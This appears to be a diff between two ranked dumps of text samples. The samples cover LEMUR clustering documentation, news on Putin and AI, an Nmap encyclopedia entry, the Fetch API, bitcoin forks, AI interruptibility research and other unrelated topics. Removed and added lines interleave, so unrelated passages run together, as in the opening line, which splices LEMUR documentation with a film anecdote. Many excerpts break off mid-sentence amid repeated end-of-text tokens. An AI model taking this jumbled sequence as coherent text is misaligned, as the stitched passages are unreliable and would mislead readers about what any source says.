clustering algorithms implemented for LEMUR are described in "A Comparison of Document Clustering Techniques", Michael Steinbach, George Karypis and Vipin Kumar. TextMining Workshop. KDD. 2000. With the exception of Probabilistic Latent Semantic Analysis (PLSA), all use cosine similarity in the vector space model as their metric. -The Assassination of Jesse James by the Coward Robert Ford +The LEMUR clustering support provides two principle APIs, the Cluster API, which defines the clusters themselves, and the ClusterDB API, which defines how Clusters are persistently stored. Similarity is scored via a SimilarityMethod object. Currently there is a single SimilarityMethod, CosSim, defined. -The Assassination of Jesse James opens with a train robbery. This scene was being filmed entirely at night, in a town called Edmonton. The train they had was supposedly a bit small (the director started calling it Thomas the Tank Engine), and they didn’t have the budget to bring a bigger train. Deakins assured the crew that with the right camera work, it wouldn’t be a big deal at all. After attempting to calm the crew down, Deakins gave the set another scare with his approach to how he’d film the scene: with just one source of light coming from a lamp set on the train. +Cluster -Considering this was being done with a night shot, everyone was rightfully pretty uneasy; what resulted, however, was possibly -================================================================================ -Rank = 58; Score = 3276800.0 -<|begin_of_text|>Russian president Vladimir Putin has joined the war of words concerning the international race to develop artificial intelligence. Speaking to students last Friday, Putin predicted that whichever country leads the way in AI research will come to dominate global affairs. +Performs the basic online clustering task. In conjunction with an incremental indexer (such as KeyfileIncIndex), it could be used for the TDT topic detection task. It iterates over the documents in the index, assigning each document that is not in any cluster to a cluster. The document id, cluster id, and score are printed to the standard output. The parameters accepted by Cluster are: -“Artificial intelligence is the future, not only for Russia, but for all humankind,” said Putin, reports RT. “It comes with colossal opportunities, but also threats that are difficult to predict. Whoever becomes the leader in this sphere will become the ruler of the world.” +index -- the index to use. Default is none. -“It comes with colossal opportunities, but also threats.” +clusterIndex -- the name of the cluster database index to use. Default is none. -The development of artificial intelligence has increasingly become a national security concern in recent years. It is China and the US (not Russia) which are seen as the two frontrunners, with China recently announcing its ambition to become the global leader in AI research by 2030. Many analysts warn that America is in danger of falling behind, especially as the Trump administration prepares to cut funding for basic science and technology research. +clusterdb_type -- One of flatfile (simple cluster database) or keyfile (btree based). -Although it’s thought that artificial intelligence will help boost countries’ economies in a number of areas, from heavy industry to medical research, AI technology will also be useful in warfare. Artificial intelligence can be used to develop cyber weapons, and control autonomous tools like drone swarms — fleets of low-cost quadcopters with a shared ‘brain’ that can be used for surveillance as well as attacking opponents. +clusterType -- Type of cluster to use, either agglomerative or centroid. Centroid is agglomerative using mean which trades memory use for speed of clustering. Default is centroid. -Both China and the US are currently researching this technology, and in his speech on Friday, Putin predicted that future wars would be fought by countries using drones. “When one party's drones are destroyed by drones of another, it will have no other choice but to surrender,” said the Russian president, according to the Associated Press. +simType -- The similarity metric to use. Default is cosine similarity (COS), which is the only implemented method. -Recently, Elon Musk and 116 other technology leaders sent a petition to the United Nations calling for new regulations on how such AI weapons are developed. The group stated that the introduction of autonomous technology would be tantamount to a “third revolution in warfare,” following the development of gunpowder and nuclear weapons. +docMode -- The scoring method to use for the agglomerative cluster type. The default is max (maximum). The choices are: max -- Maximum score over documents in a cluster. mean -- Mean score over documents in a cluster. This is identical to the centroid cluster type. avg -- Average score over documents in a cluster. min -- Minimum score over documents in a cluster. -An AI arms race doesn’t necessarily have to be a winner-takes-all scenario, though. Putin noted that Russia did not want to see any one country “monopolize” the field, and said instead: “If we become leaders in this area, we will share this know-how with entire world, the same way we share our nuclear technologies today.” +threshold -- Minimum score for adding a document to an existing cluster. Default is 0.25. -Update September 4th, 5:40AM ET: Elon Musk offers his cheery perspective on Twitter:<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +The example application that demonstrates the basic offline clustering task. Provides k-means and bisecting k-means partitional clustering. It will run each algorithm on the first 100 documents in the index (or all of them if less than 100) and print out the results. The parameters accepted by ================================================================================ -Rank = 59; Score = 3276800.0 -<|begin_of_text|>We think our destiny is to journey to Mars and beyond. Yet as we build our spacecraft, we're about to be broadsided - from a different direction - by the most explosive event in history. - -Sometime in the future science will be able to create realities that we can't even begin to imagine. As we evolve, we'll be able to construct other information systems that correspond to other realities, universes based on logic completely different from ours and not based on space and time. +Rank = 60; Score = 1884160.0 +<|begin_of_text|>Quality of life (QOL) is an overarching term for the quality of the various domains in life. It is a standard level that consists of the expectations of an individual or society for a good life. These expectations are guided by the values, goals and socio-cultural context in which an individual lives. It is a subjective, multidimensional concept that defines a standard level for emotional, physical, material and social well-being. It serves as a reference against which an individual or society can measure the different domains of one’s own life. The extent to which one's own life coincides with this desired standard level, put differently, the degree to which these domains give satisfaction and as such contribute to one's subjective well-being, is called life satisfaction. -Immanuel Kant declared in 1781 that space and time were real, but only indeed as properties of the mind. These algorithms are not only the key to consciousness, but why space and time − indeed the properties of matter itself - are relative to the observer. But a new theory called biocentrism suggests that space and time may not be the only tools that can be used to construct reality. At present, our destiny is to live and die in the everyday world of up and down. But what if, for example, we changed the algorithms so that instead of time being linear, it was 3-dimensional like space? Consciousness would move through the multiverse. We'd be able to walk through time just like we walk through space. And after creeping along for 4 billion years, life would finally figure out how to escape from its corporeal cage. Our destiny would lie in realities that exist outside of the known physical universe. +Overview [ edit ] -Even science fiction is struggling with the implications. In "Avatar," human consciousness is infused into blue aliens that inhabit a wondrous world. However, according to biocentrism, replicating human intelligence or consciousness will require the same kind of algorithms for employing time and space that we enjoy. Everything we experience is a whirl of information occurring in our heads. Time is simply the summation of spatial states - much like the frames in a film - occurring inside the mind. It's just our way of making sense of things. There's also a peculiar intangibility to space. We can't pick it up and bring it to the laboratory. Like time, space isn't an external object. It's part of the mental software that molds information into multidimensional objects. +Quality of life is the general well-being of individuals and societies, outlining negative and positive features of life. It observes life satisfaction, including everything from physical health, family, education, employment, wealth, safety, security to freedom, religious beliefs, and the environment.[1] QOL has a wide range of contexts, including the fields of international development, healthcare, politics and employment. It is important not to mix up the concept of QOL with a more recent growing area of health related QOL (HRQOL[2]). An assessment of HRQOL is effectively an evaluation of QOL and its relationship with health. -We take for granted how our mind puts everything together. When I woke up this morning, I was in the middle of a dream that seemed as real as everyday life. I remember looking out over a crowded port with people in the foreground. Further out, there were ships engaged in battle. And still further out to sea was a battleship with -================================================================================ -Rank = 60; Score = 3276800.0 -<|begin_of_text|>Eigenfaces is the name given to a set of eigenvectors when they are used in the computer vision problem of human face recognition.[1] The approach of using eigenfaces for recognition was developed by Sirovich and Kirby (1987) and used by Matthew Turk and Alex Pentland in face classification.[2] The eigenvectors are derived from the covariance matrix of the probability distribution over the high-dimensional vector space of face images. The eigenfaces themselves form a basis set of all images used to construct the covariance matrix. This produces dimension reduction by allowing the smaller set of basis images to represent the original training images. Classification can be achieved by comparing how faces are represented by the basis set. +Quality of life should not be confused with the concept of standard of living, which is based primarily on income. -History [ edit ] +Standard indicators of the quality of life include not only wealth and employment but also the built environment, physical and mental health, education, recreation and leisure time, and social belonging.[3][4] According to the World Health Organization (WHO), quality of life is defined as “the individual’s perception of their position in life in the context of the culture and value systems in which they live and in relation to their goals.” In comparison to WHO's definitions, the Wong-Baker Faces Pain Rating Scale defines quality of life as “life quality (in this case, physical pain) at a precise moment in time.”[5] -The eigenface approach began with a search for a low-dimensional representation of face images. Sirovich and Kirby (1987) showed that principal component analysis could be used on a collection of face images to form a set of basis features. These basis images, known as eigenpictures, could be linearly combined to reconstruct images in the original training set. If the training set consists of M images, principal component analysis could form a basis set of N images, where N < M. The reconstruction error is reduced by increasing the number of eigenpictures, however the number needed is always chosen less than M. For example, if you need to generate a number of N eigenfaces for a training set of M face images, you can say that each face image can be made up of "proportions" of all this K "features" or eigenfaces : Face image 1 = (23% of E 1 ) + (2% of E 2 ) + (51% of E 3 ) +... + (1% E n ). +According to ecological economist Robert Costanza: -In 1991 M. Turk and A. Pentland expanded these results and presented the eigenface method of face recognition.[3] In addition to designing a system for automated face recognition using eigenfaces, they showed a way of calculating the eigenvectors of a covariance matrix in such a way as to make it possible for computers at that time to perform eigen-decomposition on a large number of face images. Face images usually occupy a high-dimensional space and conventional principal component analysis was intractable on such data sets. Turk and Pentland's paper demonstrated ways to extract the eigenvectors based on matrices sized by the number of images rather than the number of pixels. +While Quality of Life (QOL) has long been an explicit or implicit policy goal, adequate definition and measurement have been elusive. Diverse "objective" and "subjective" indicators across a range of disciplines and scales, and recent work on subjective well-being (SWB) surveys and the psychology of happiness have spurred renewed interest.[6] -Once established, the eigenface method was expanded to include methods of preprocessing to improve accuracy.[4 +One approach, called engaged theory, outlined ================================================================================ -Rank = 61; Score = 3260416.0 -<|begin_of_text|>Fetch is the native AJAX API to replace jQuery.get() - -As a term AJAX has been around for over a decade now. While many still relate to it as rich and fluid interfaces, the real deal is the possibility of making asynchronous requests to the server from the browser. - -As browsers evolved the XMLHttpRequest API used for AJAX did not not evolve. This is why many developers still rely on including the whole jQuery library just to abstract asynchronous HTTP Request. jQuery has a great and simple to use API for many things, but including it just for AJAX is overkill. +Rank = 61; Score = 1867776.0 +<|begin_of_text|>network scanner -Finally the Web API has a new native alternative available. This is known as the Fetch API and offers a very simple way of getting content from the server with JavaScript in the browser. The API is a high level one that has a generic definition of HTTP Request and Response objects. +Nmap (Network Mapper) is a free and open-source network scanner created by Gordon Lyon (also known by his pseudonym Fyodor Vaskovich).[3] Nmap is used to discover hosts and services on a computer network by sending packets and analyzing the responses. -To anyone used to working with the HTTP, the concepts are immediately familiar: +Nmap provides a number of features for probing computer networks, including host discovery and service and operating system detection. These features are extensible by scripts that provide more advanced service detection,[4] vulnerability detection,[4] and other features. Nmap can adapt to network conditions including latency and congestion during a scan. -GlobalFetch : Contains the fetch() method used to fetch a resource. +Nmap started as a Linux utility[5] and was ported to other systems including Windows, macOS, and BSD.[6] Linux is the most popular platform, followed by Windows.[7] -: Contains the fetch() method used to fetch a resource. Headers : Represents response/request headers, allowing you to query them and take different actions depending on the results. +Features [ edit ] -: Represents response/request headers, allowing you to query them and take different actions depending on the results. Request : Represents a resource request. +Nmap features include: -: Represents a resource request. Response: Represents the response to a request. +Host discovery – Identifying hosts on a network. For example, listing the hosts that respond to TCP and/or ICMP requests or have a particular port open. -In addition to standard features developers would expect, the Fetch API definition handles closely related concepts such as CORS (Cross-origin resource sharing) and HTTP origin headers. The fetch resouce is available in the browser's standard window object and has only a single mandatory argument - the request URL. +Port scanning – Enumerating the open ports on target hosts. -The fetch method returns a JavaScript promise that makes it convenient to work with the asynchronous nature of HTTP requests in the browser context. Once the response is received, there are a number of methods available in the object. +Version detection – Interrogating network services on remote devices to determine application name and version number. [8] -Browser support for the Fetch API is very good with evergreen browsers such as Chrome, Edge, Firefox and Opera already supporting the feature. Internet Explorer does not support the API, but there is a fetch API polyfill that can be used for it.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 62; Score = 3260416.0 -<|begin_of_text|>Document Clustering +OS detection – Determining the operating system and hardware characteristics of network devices. -Contents +Scriptable interaction with the target – using Nmap Scripting Engine[9] (NSE) and Lua programming language. -Document clustering is the act of collecting similar documents into bins, where similarity is some function on a document. The clustering algorithms implemented for LEMUR are described in "A Comparison of Document Clustering Techniques", Michael Steinbach, George Karypis and Vipin Kumar. TextMining Workshop. KDD. 2000. With the exception of Probabilistic Latent Semantic Analysis (PLSA), all use cosine similarity in the vector space model as their metric. +Nmap can provide further information on targets, including reverse DNS names, device types, and MAC addresses.[10] -The LEMUR clustering support provides two principle APIs, the Cluster API, which defines the clusters themselves, and the ClusterDB API, which defines how Clusters are persistently stored. Similarity is scored via a SimilarityMethod object. Currently there is a single SimilarityMethod, CosSim, defined. +Typical uses of Nmap: -Cluster +Auditing the security of a device or firewall by identifying the network connections which can be made to, or through it. [11] -Performs the basic online clustering task. In conjunction with an incremental indexer (such as KeyfileIncIndex), it could be used for the TDT topic detection task. It iterates over the documents in the index, assigning each document that is not in any cluster to a cluster. The document id, cluster id, and score are printed to the standard output. The parameters accepted by Cluster are: +Identifying open ports on a target host in preparation for auditing. [12] -index -- the index to use. Default is none. +Network inventory, network mapping, maintenance and asset management. -clusterIndex -- the name of the cluster database index to use. Default is none. +Auditing the security of a network by identifying new servers. [13] -clusterdb_type -- One of flatfile (simple cluster database) or keyfile (btree based). +Generating traffic to hosts on a network, response analysis and response time measurement. [14] -clusterType -- Type of cluster to use, either agglomerative or centroid. Centroid is agglomerative using mean which trades memory use for speed of clustering. Default is centroid. +Finding and exploiting vulnerabilities in a network. [15] -simType -- The similarity metric to use. Default is cosine similarity (COS), which is the only implemented method. +DNS queries and subdomain search -docMode -- The scoring method to use for the agglomerative cluster type. The default is max (maximum). The choices are: max -- Maximum score over documents in a cluster. mean -- Mean score over documents in a cluster. This is identical to the centroid cluster type. avg -- Average score over documents in a cluster. min -- Minimum score over documents in a cluster. +User interfaces [ edit ] -threshold -- Minimum score for adding a document to an existing cluster. Default is 0.25. +NmapFE, originally written by Zach Smith, was Nmap's official GUI for Nmap versions 2.2 to 4.22.[16] For Nmap 4.50 (originally in the 4.22SOC development series) NmapFE was replaced with Zenmap, a new official graphical user interface based on UMIT, developed by Adriano Monteiro Marques. -The example application that demonstrates the basic offline clustering task. Provides k-means and bisecting k-means partitional clustering. It will run each algorithm on the first 100 documents in the index (or all of them if less than 100) and print out the results. The parameters accepted by +Various web-based interfaces allow controlling Nmap or analysing Nmap results from a ================================================================================ -Rank = 63; Score = 3211264.0 +Rank = 62; Score = 1859584.0 <|begin_of_text|>-Fixed a bug that caused small dogs to start barking and never stop. -Small dogs are no longer supported, and will self-terminate within two months. @@ -1575,276 +1540,342 @@ Rank = 63; Score = 3211264.0 -Fixed a ================================================================================ -Rank = 64; Score = 3211264.0 -<|begin_of_text|>DURHAM, N.C. – In experiments reproducing the natural environment, Duke University researchers have demonstrated that silver nanoparticles, which are used in many consumer products, can have an adverse effect on plants and microorganisms. +Rank = 63; Score = 1794048.0 +<|begin_of_text|>Fetch is the native AJAX API to replace jQuery.get() -These preliminary findings are important, the researchers said, because little is known about the environmental effects of these nanoparticles, and the only studies conducted to date involve high concentrations of the nanoparticles in a laboratory setting, which they point out, doesn’t represent “real-world” conditions. +As a term AJAX has been around for over a decade now. While many still relate to it as rich and fluid interfaces, the real deal is the possibility of making asynchronous requests to the server from the browser. -Silver nanoparticles are used in a host of products, most commonly in textiles and clothing. These nanoparticles are used because one of their characteristics is the ability to kill bacteria, inhibiting unwanted odors. They work through different mechanisms, including generating oxygen free radicals which can cause DNA damage to microbial membranes without harming human cells. Other products with silver nanoparticles are children’s toys and pacifiers, disinfectants and toothpaste. +As browsers evolved the XMLHttpRequest API used for AJAX did not not evolve. This is why many developers still rely on including the whole jQuery library just to abstract asynchronous HTTP Request. jQuery has a great and simple to use API for many things, but including it just for AJAX is overkill. -The main route by which these particles enter the environment is as a by-product of water and sewage treatment plants. The nanoparticles are too small to be filtered out, so they and other materials end up in the resulting “sludge,” which is then spread on the land surface as a fertilizer. +Finally the Web API has a new native alternative available. This is known as the Fetch API and offers a very simple way of getting content from the server with JavaScript in the browser. The API is a high level one that has a generic definition of HTTP Request and Response objects. -“Results from laboratory studies are difficult to extrapolate to ecosystems, where exposures will likely be at low concentrations and which are inhabited by a diversity of organisms,” said Benjamin Colman, a post-doctoral fellow in Duke’s biology department and a member of the Center for the Environmental Implications of Nanotechnology (CEINT), which is funded by the National Science Foundation and the Environmental Protection Agency. +To anyone used to working with the HTTP, the concepts are immediately familiar: -“No one really knows what the effects of these particles are in the environment,” Colman said. “We’re trying to come up with the data that can be used to help regulators determine the risks to the environment from silver nanoparticle exposures.” +GlobalFetch : Contains the fetch() method used to fetch a resource. -The results of the CEINT team’s experiments were published Feb. 27 in the online journal PLOS ONE. +: Contains the fetch() method used to fetch a resource. Headers : Represents response/request headers, allowing you to query them and take different actions depending on the results. -“Our field studies show adverse responses of plants and microorganisms in a replicated long-term terrestrial environment following a single low dose of silver nanoparticles, applied by the likely route of exposure, sewage biosolid application,” Colman said. “An estimated 60 percent of the average 5.6 million tons of biosolids produced each year is applied to the land for various reasons, and this practice represents an important and understudied route of exposure of natural ecosystems to engineered nanoparticles.” +: Represents response/request headers, allowing you to query them and take different actions depending on the results. Request : Represents a resource request. -For their studies, the CEINT researchers created mesocosms, which are small, man-made structures containing different plants and microorganisms meant -================================================================================ -Rank = 65; Score = 3145728.0 -<|begin_of_text|>We live in a world of pain and suffering. There is no one who is not affected by the harsh realities of life, and the question “why do bad things happen to good people?” is one of the most difficult questions in all of theology. God is sovereign, so all that happens must have at least been allowed by Him, if not directly caused by Him. At the outset, we must acknowledge that human beings, who are not eternal, infinite, or omniscient, cannot expect to fully understand God’s purposes and ways.The book of Job deals with the issue of why God allows bad things to happen to good people. Job was a righteous man (Job 1:1), yet he suffered in ways that are almost beyond belief. God allowed Satan to do everything he wanted to Job except kill him, and Satan did his worst. What was Job’s reaction? “Though he slay me, yet will I hope in him” (Job 13:15). “The LORD gave and the LORD has taken away; may the name of the LORD be praised” (Job 1:21). Job did not understand why God had allowed the things He did, but he knew God was good and therefore continued to trust in Him. Ultimately, that should be our reaction as well.Why do bad things happen to good people? As hard as it is to acknowledge, we must remember that there are no “good” people, in the absolute sense of the word. All of us are tainted by and infected with sin (Ecclesiastes 7:20; Romans 3:23; 1 John 1:8). As Jesus said, “No one is good—except God alone” (Luke 18:19). All of us feel the effects of sin in one way or another. Sometimes it’s our own personal sin; other times, it’s the sins of others. We live in a fallen world, and we experience the effects of the fall. One of those effects is injustice and seemingly senseless suffering.When wondering why God would allow bad things to happen to good people, it’s also good to consider these four things about the bad things that happen:1) Bad things may happen to good people in this world, but this world is not the end. Christians have an eternal perspective: “We do not lose heart. Though outwardly we are wasting away, yet inwardly we are being renewed day by day. For our light and momentary troubles are achieving for us an eternal glory that far -================================================================================ -Rank = 66; Score = 3080192.0 -<|begin_of_text|>ADVERTISEMENT +: Represents a resource request. Response: Represents the response to a request. -Earth's climate is changing rapidly. We know this from billions of observations, documented in thousands of journal papers and texts, and summarized every few years by the United Nations' Intergovernmental Panel on Climate Change. The primary cause of that change is the release of carbon dioxide from burning coal, oil, and natural gas. +In addition to standard features developers would expect, the Fetch API definition handles closely related concepts such as CORS (Cross-origin resource sharing) and HTTP origin headers. The fetch resouce is available in the browser's standard window object and has only a single mandatory argument - the request URL. -Negotiations about reducing emissions grind on. But in the meantime, how much warming are we already locked into? If we stop emitting greenhouse gases tomorrow, why would the temperature continue to rise? +The fetch method returns a JavaScript promise that makes it convenient to work with the asynchronous nature of HTTP requests in the browser context. Once the response is received, there are a number of methods available in the object. -The basics of carbon and climate +Browser support for the Fetch API is very good with evergreen browsers such as Chrome, Edge, Firefox and Opera already supporting the feature. Internet Explorer does not support the API, but there is a fetch API polyfill that can be used for it.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 64; Score = 1777664.0 +<|begin_of_text|>Academics from the Future of Humanity Institute (FHI), part of the Oxford Martin School, are teaming up with Google DeepMind to make artificial intelligence safer. -The carbon dioxide that accumulates in the atmosphere insulates the surface of the Earth. It's like a warming blanket that holds in heat. This energy increases the Earth's surface average temperature, heats the oceans, and melts polar ice. As consequences, sea level rises and weather changes. +Stuart Armstrong, Alexander Tamas Fellow in Artificial Intelligence and Machine Learning at FHI, and Laurent Orseau of Google DeepMind, will present their research on reinforcement learning agent interruptibility at the UAI 2016 conference in New York City later this month. -The Arctic is warming much faster than the average global temperature; ice in the Arctic Ocean is melting and the permafrost is thawing. Ice sheets in both the Arctic and Antarctic are melting. Ecosystems on both land and in the sea are changing. The observed changes are coherent and consistent with our theoretical understanding of the Earth's energy balance and simulations from models that are used to understand past variability and to help us think about the future. +Armstrong and Orseau’s research explores a method to ensure that reinforcement learning agents can be safely interrupted repeatedly by human or automatic overseers. This ensures that the agents do not “learn” about the interruptions, and do not take steps to avoid or manipulate the interruptions. -Slam on the climate brakes +Interruptibility has several advantages as an approach over previous methods of control. As Dr Armstrong explains, “Interruptibility has applications for many current agents, especially when we need the agent not to learn from specific experiences during training. Many of the naïve ideas for accomplishing this - such as deleting certain histories from the training set - change the behaviour of the agent in unfortunate ways.” -What would happen to the climate if we were to stop emitting carbon dioxide today, right now? Would we return to the climate of our elders? The simple answer is no. Once we release the carbon dioxide stored in the fossil fuels we burn, it accumulates in and moves amongst the atmosphere, the oceans, the land, and the plants and animals of the biosphere. The released carbon dioxide will remain in the atmosphere for thousands of years. Only after many millennia will it return to rocks, for example, through the formation of calcium carbonate — limestone — as marine organisms' shells settle to the bottom of the ocean. But on time spans relevant to humans, once released the carbon dioxide is in our environment essentially forever. It does not go away, unless we, ourselves, remove it. +In the paper, the researchers provide a formal definition of safe interruptibility, show that some types of agents already have this property, and show that others can be easily modified to gain it. They also demonstrate that even an ideal agent that tends to the optimal behaviour in any computable environment can be made safely interruptible. -If we stop emitting today, it's not the end of the story for global warming. There's a delay in temperature increase as the climate catches up with all the carbon that's in the atmosphere. After maybe 40 more years, the climate will stabilize at a temperature higher than what was normal for previous generations. +Dr Armstrong continued: “Machine learning is one of the most powerful tools for building AI that has ever existed. But applying it to questions of AI motivation is problematic: just as we humans would not willingly change to an alien system of values, any agent has a natural tendency to avoid changing its current values, even if we want to change or tune them. -This decades-long lag between cause and effect is due to the long time it takes to heat the the ocean's huge mass +"Interruptibility, and the related general idea of corrigibility, allow such changes to happen without the agent trying to resist them or force them. The newness of the field of AI safety means that there is relatively little awareness of these problems in the wider machine learning community. As with other areas of AI research, DeepMind remains at the cutting edge of this important subfield.”<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 67; Score = 3063808.0 -<|begin_of_text|>For a broader coverage of forks, see Fork (blockchain) +Rank = 65; Score = 1720320.0 +<|begin_of_text|>Counter heat current exchange: Note the gradually declining differential and that the once hot and cold streams exit at the reversed temperature difference; the hotter entering stream becomes the exiting cooler stream and vice versa. -Bitcoin forks are defined variantly as changes in the protocol of the bitcoin network or as the situations that occur "when two or more blocks have the same block height".[1] A fork influences the validity of the rules. Forks are typically conducted in order to add new features to a blockchain, to reverse the effects of hacking or catastrophic bugs. Forks require consensus to be resolved or else a permanent split emerges. +Countercurrent exchange is a mechanism occurring in nature and mimicked in industry and engineering, in which there is a crossover of some property, usually heat or some chemical, between two flowing bodies flowing in opposite directions to each other. The flowing bodies can be liquids, gases, or even solid powders, or any combination of those. For example, in a distillation column, the vapors bubble up through the downward flowing liquid while exchanging both heat and mass. -Forks of the client software +The maximum amount of heat or mass transfer that can be obtained is higher with countercurrent than co-current (parallel) exchange because countercurrent maintains a slowly declining difference or gradient (usually temperature or concentration difference). In cocurrent exchange the initial gradient is higher but falls off quickly, leading to wasted potential. For example, in the adjacent diagram, the fluid being heated (exiting top) has a higher exiting temperature than the cooled fluid (exiting bottom) that was used for heating. With cocurrent or parallel exchange the heated and cooled fluids can only approach one another. The result is that countercurrent exchange can achieve a greater amount of heat or mass transfer than parallel under otherwise similar conditions. See: flow arrangement. -The following are forks of the software client for the bitcoin network: +Countercurrent exchange when set up in a circuit or loop can be used for building up concentrations, heat, or other properties of flowing liquids. Specifically when set up in a loop with a buffering liquid between the incoming and outgoing fluid running in a circuit, and with active transport pumps on the outgoing fluid's tubes, the system is called a countercurrent multiplier, enabling a multiplied effect of many small pumps to gradually build up a large concentration in the buffer liquid. -All three software clients attempt to increase transaction capacity of the network. None achieved a majority of the hash power.[2] +Other countercurrent exchange circuits where the incoming and outgoing fluids touch each other are used for retaining a high concentration of a dissolved substance or for retaining heat, or for allowing the external buildup of the heat or concentration at one point in the system. -Intended hard forks splitting the cryptocurrency +Countercurrent exchange circuits or loops are found extensively in nature, specifically in biologic systems. In vertebrates, they are called a rete mirabile, originally the name of an organ in fish gills for absorbing oxygen from the water. It is mimicked in industrial systems. Countercurrent exchange is a key concept in chemical engineering thermodynamics and manufacturing processes, for example in extracting sucrose from sugar beet roots. -Hard forks splitting bitcoin (aka "split coins") are created via changes of the blockchain rules and sharing a transaction history with bitcoin up to a certain time and date. The first hard fork splitting bitcoin happened on 1 August 2017, resulting in the creation of Bitcoin Cash. +Countercurrent multiplication is a similar +================================================================================ +Rank = 66; Score = 1712128.0 +<|begin_of_text|>Contractors' All Risks (CAR) Insurance Definition -The following is a list of hard forks splitting bitcoin by date and/or block: +What is 'Contractors' All Risks (CAR) Insurance' -Bitcoin Cash: Forked at block 478558, 1 August 2017, for each bitcoin (BTC), an owner got 1 Bitcoin Cash (BCH) +Contractors' All Risks (CAR) insurance is an insurance policy that provides coverage for both damage to a property and third-party injury or damage claims. -Bitcoin Gold: Forked at block 491407, 24 October 2017, for each BTC, an owner got 1 Bitcoin Gold (BTG) +Types of Risk in Construction Project -Bitcoin SV: Forked at block 556766, 15 November 2018, for each Bitcoin Cash (BCH), an owner got 1 Bitcoin SV (BSV). +Damage to the property -Intended soft forks splitting from not-most-work block +Third-parties Damage -The fork fixing the value overflow incident was controversial because it was announced after the exploit was mined. +Why Contractors' All Risks (CAR) Insurance -Unintended hard forks +Contractors' All Risks Insurance Coverage -Two hard forks were created by "protocol change" definition: +Tags: -March 2013 Chain Fork (migration from BerkeleyDB to LevelDB caused a chain split) [3] +contractors liability insurance engineer insurance, engineering insurance, professional liability insurance cost, professional liability insurance, contractor insurance, contractor liability insurance, contractors all risk insurance, engineers insurance, insurance for engineers, professional engineer insurance, professional indemnity insurance, professional insurance, contractors insurance -CVE-2018-17144 (Bitcoin 0.15 allowed double spending certain inputs in the same block. Not 